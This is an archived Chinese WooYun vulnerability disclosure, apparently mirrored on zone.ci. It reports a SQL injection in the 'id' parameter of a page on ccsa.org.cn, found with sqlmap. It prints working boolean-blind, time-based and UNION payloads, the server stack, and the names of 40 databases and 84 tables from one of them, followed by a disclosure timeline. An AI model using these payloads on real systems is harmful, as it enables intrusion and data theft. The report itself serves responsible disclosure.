乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-30: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经确认,细节仅向厂商公开 2015-08-13: 细节向核心白帽子及相关领域专家公开 2015-08-23: 细节向普通白帽子公开 2015-09-02: 细节向实习白帽子公开 2015-09-17: 细节向公众公开
RT,SQLMAP打它
URL:http://www.ccsa.org.cn/bpggs/gs_content.php?id=19直接sqlmap,嗯。数据库里的内容比较多,没懂怎么命名的(难道是专业的原因吗= =),数据库及表挺多的随便看了一个列里面的专业资料也是较多,后来扫得被禁了,便未深入。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=16 AND 4205=4205 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=16 AND (SELECT * FROM (SELECT(SLEEP(5)))gEna) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: id=16 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171766b71,0x664c596a426c56617950,0x716a627871),NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.3.29, Apache 2.4.12back-end DBMS: MySQL 5.0.12
看看数据库
available databases [40]:[*] #mysql50#lost+found[*] article[*] auth[*] ccsa_access_log[*] ccsadoc[*] client_update[*] customer[*] del_mladvert[*] del_ptpic[*] del_pw_log[*] del_style[*] del_test[*] del_tmparticle[*] doc[*] fileopen[*] good_member[*] gsc15[*] information_schema[*] IOofCOM[*] jiaoliu[*] log[*] logs[*] maintain[*] meeting[*] mnogosearch[*] mysql[*] phpmyadmin[*] prod[*] prodex[*] questionnaire[*] sales[*] shenbao[*] std[*] std_temp[*] stdcd[*] tc485[*] test[*] tlc[*] tspc[*] userstd
再随便看个:
Database: std[84 tables]+------------------------+| ansi || ansinew || asme || astm || astmnew || atm || bs || bsnew || catr_std_view || ccsa || ccsa_r5 || din || dinnew || dl || docfile || en || ennew || etsi || etsinew || fieldname || gb || gb_class || gjb || gpp || gpp2 || gppnew || gy || iec || iec_tc || iecnew || ieee || ieeenew || ietf || iso || isonew || itur || itut || itut_dl || itutdel || jis || jisnew || major_class || major_to_std || nf || nfnew || onem2m || order_only || othergn || prepublish || pzy_yd || ref_itu || ref_type || simsuser || sj || std_author || std_fs || std_status || std_to_author || std_to_grp || std_to_std || std_to_tcwg || t1 || tablename || tablename_20080317 || tablename_to_grp || tablename_to_privilege || tablename_to_tcwg || tia || tianew1 || tiaold || tx_ly_done || ul || ulnew || view_cdma2000 || view_td || view_wcdma || wap || yd || yd_class || yd_jjg || yd_unit || ydb || ydc || yz |+------------------------+
通信大牛比我懂= =
危害等级:高
漏洞Rank:10
确认时间:2015-08-03 12:03
CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。
暂无